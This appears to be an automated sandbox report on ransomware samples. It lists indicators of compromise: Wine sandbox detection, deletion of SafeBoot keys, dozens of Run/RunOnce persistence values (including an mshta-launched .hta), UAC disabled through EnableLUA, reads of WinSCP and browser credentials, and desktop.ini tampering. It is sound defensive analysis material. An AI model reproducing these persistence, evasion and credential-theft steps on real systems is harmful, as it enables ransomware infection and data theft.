4536	Trojan-Ransom.Win32.Sodin.bi-4871bea79e651791fb79ef0bc46f61e728c41d27e7f5b8877d0958a8672f26ea.exe
2304	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
2864	Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe
1396	Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe
4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe
2768	VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe
5540	Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe
5804	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
9960	Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe
9200	Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe
8824	HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
5868	lurwhzlcveb.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\WINE	Trojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exe
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\WINE	Sunwin.exe

Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys	ajhqekm.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc	ajhqekm.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power	ajhqekm.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys	ajhqekm.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc	ajhqekm.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager	ajhqekm.exe

Loads dropped DLL 1 IoCs

pid	Process
8824	HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5856	icacls.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "pjsmlcpgxqeuykcbus.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe"	lurwhzlcveb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe"	lurwhzlcveb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "gzhayoaqgyladofdv.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\""	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "avfaasgyqkzqvibbvue.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe ."	lurwhzlcveb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "czlikeuoievovkfhdeqnz.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe ."	lurwhzlcveb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "njuqrkzslgwouicdyyjf.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "njuqrkzslgwouicdyyjf.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7c663e5a-c668-44b3-88ed-139e79eff5db\\Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe\" --AutoStart"	Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tpvpyme.exe = "C:\\Users\\Admin\\Desktop\\00378\\tpvpyme.exe"	tpvpyme.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "avfaasgyqkzqvibbvue.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "czlikeuoievovkfhdeqnz.exe ."	lurwhzlcveb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\njuqrkzslgwouicdyyjf.exe ."	lurwhzlcveb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "czlikeuoievovkfhdeqnz.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "pjsmlcpgxqeuykcbus.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe ."	lurwhzlcveb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "pjsmlcpgxqeuykcbus.exe"	lurwhzlcveb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "avfaasgyqkzqvibbvue.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "zryqncncriuikukh.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "czlikeuoievovkfhdeqnz.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "gzhayoaqgyladofdv.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "avfaasgyqkzqvibbvue.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "czlikeuoievovkfhdeqnz.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "gzhayoaqgyladofdv.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe = "C:\\Windows\\System32\\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe"	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "gzhayoaqgyladofdv.exe ."	lurwhzlcveb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "avfaasgyqkzqvibbvue.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "zryqncncriuikukh.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "njuqrkzslgwouicdyyjf.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\PCI Subsystem = "C:\\Program Files (x86)\\PCI Subsystem\\pciss.exe"	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{B1A3BC66-CC3D-2FEC-5EB2-1A93B140E6CE} = "C:\\Users\\Admin\\AppData\\Roaming\\Sun\\Sunwin.exe"	Sunwin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "pjsmlcpgxqeuykcbus.exe"	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "pjsmlcpgxqeuykcbus.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "avfaasgyqkzqvibbvue.exe ."	lurwhzlcveb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "czlikeuoievovkfhdeqnz.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe ."	ajhqekm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\upfqruwsetn = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\trnjou.exe\""	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "avfaasgyqkzqvibbvue.exe"	ajhqekm.exe

Checks whether UAC is enabled 1 TTPs 9 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ajhqekm.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ajhqekm.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ajhqekm.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lurwhzlcveb.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lurwhzlcveb.exe

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	\??\c:\users\public\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\admin\onedrive\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\admin\pictures\saved pictures\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	\??\c:\users\admin\contacts\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\admin\desktop\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\admin\documents\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\admin\saved games\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\public\libraries\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	\??\c:\users\public\documents\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	\??\c:\program files (x86)\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\public\accountpictures\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\public\pictures\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\public\videos\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	\??\c:\users\admin\favorites\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\public\desktop\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	\??\c:\program files\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\public\downloads\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\public\music\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	\??\c:\users\admin\pictures\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
